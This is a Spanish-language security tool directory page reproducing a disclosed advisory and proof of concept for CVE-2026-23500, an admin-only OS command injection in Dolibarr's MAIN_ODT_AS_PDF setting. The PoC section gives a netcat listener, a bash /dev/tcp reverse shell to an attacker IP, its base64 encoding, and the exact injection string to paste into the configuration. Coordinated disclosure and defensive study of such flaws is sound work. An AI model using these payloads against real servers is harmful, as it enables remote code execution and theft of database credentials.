Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23500 — CVE-2026-23500 - Inyección de comandos del sistema operativo (RCE) a través de la configuración MAIN_ODT_AS_PDF en Dolibarr | Kitploit
Herramientas/GitHubGitHub/lukasz-rybak/cve-2026-23500
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlPapers e InvestigaciónAprendizaje y Educación
GitHublukasz-rybak/cve-2026-23500

CVE-2026-23500

CVE-2026-23500 - Inyección de comandos del sistema operativo (RCE) a través de la configuración MAIN_ODT_AS_PDF en Dolibarr

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23500: Inyección de comandos del sistema operativo (RCE) a través de la configuración MAIN_ODT_AS_PDF en Dolibarr

Información general

CampoDetalles
ID de CVECVE-2026-23500
SeveridadCRÍTICA
AvisoGHSA-w5j3-8fcr-h87w
Descubierto porLukasz Rybak

Productos afectados

  • Dolibarr/dolibarr (versiones: <= 22.0.4)
  • Corregido en: 23.0

Clasificación CWE

  • CWE-78: Neutralización incorrecta de elementos especiales utilizados en un comando del sistema operativo ('Inyección de comandos del sistema operativo')

Detalles

Resumen

Un administrador autenticado puede ejecutar comandos arbitrarios del sistema operativo inyectando una carga útil maliciosa en la constante de configuración MAIN_ODT_AS_PDF. Esta vulnerabilidad existe porque la aplicación no valida ni escapa adecuadamente la ruta del comando antes de pasarla a la función exec() en el proceso de conversión de ODT a PDF.

Detalles

La vulnerabilidad se encuentra en htdocs/includes/odtphp/odf.php. Cuando el sistema intenta convertir un documento ODT a PDF (p. ej., en Propuestas, Facturas), construye un comando de shell utilizando el ajuste global MAIN_ODT_AS_PDF.

Fragmento de código (htdocs/includes/odtphp/odf.php, aprox. línea 930):

root@kitploit:~
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);

Mientras que el nombre de archivo $name se sanitiza mediante escapeshellcmd(), la variable de configuración MAIN_ODT_AS_PDF se obtiene directamente de la base de datos y se concatena al principio de la cadena. Un atacante con privilegios administrativos puede establecer esta variable para que incluya un separador de comandos (como ;) seguido de comandos arbitrarios.

PoC

Requisitos previos:

  1. Inicie sesión como administrador.
  2. Asegúrese de que el módulo "Propuestas comerciales" esté habilitado y de que las "plantillas ODT" estén activadas en su configuración.

Pasos para reproducir (Reverse Shell):

  1. Inicie un listener de netcat en la máquina del atacante (IP: 172.26.0.1, Puerto: 4445):
root@kitploit:~
nc -lvnp 4445
  1. Prepare la carga útil. Para evitar problemas con caracteres especiales (como & o >) que podrían ser escapados por la aplicación web o el shell, codifique el comando de reverse shell en Base64:

    root@kitploit:~
    # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
    echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
    # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
    
  2. Navegue a Inicio -> Configuración -> Otra configuración.

  3. Agregue o modifique la constante MAIN_ODT_AS_PDF con la siguiente carga útil de inyección:

    root@kitploit:~
    jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
    

    (Explicación: jodconverter satisface la comprobación inicial, ; actúa como separador de comandos y la canalización decodifica y ejecuta la carga útil en Base64).

    imagen
  4. Navegue a Comercio -> Nueva propuesta, cree un borrador, seleccione una plantilla ODT (p. ej., generic_proposal_odt) y haga clic en .

imagen imagen
  1. Compruebe el listener de netcat. Se establecerá una conexión que otorgará un shell en el servidor:
imagen

Impacto

Ejecución remota de código (RCE). Un atacante que obtenga acceso a una cuenta de administrador (o un administrador malintencionado) puede ejecutar comandos arbitrarios en el servidor subyacente con los privilegios del usuario del servidor web (normalmente www-data). Esto permite:

  • Leer archivos de configuración sensibles (credenciales de la base de datos).
  • Modificar el código de la aplicación.
  • Comprometer totalmente el sistema dependiendo de la configuración del servidor (p. ej., escape de Docker, pivoting).

Créditos

Reportado por Łukasz Rybak

Referencias

  • https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23500

Descargo de responsabilidad

Este CVE fue divulgado de forma responsable siguiendo las prácticas de divulgación coordinada de vulnerabilidades. La información aquí proporcionada tiene únicamente fines educativos y defensivos.

Descargar herramienta
Generar
imagen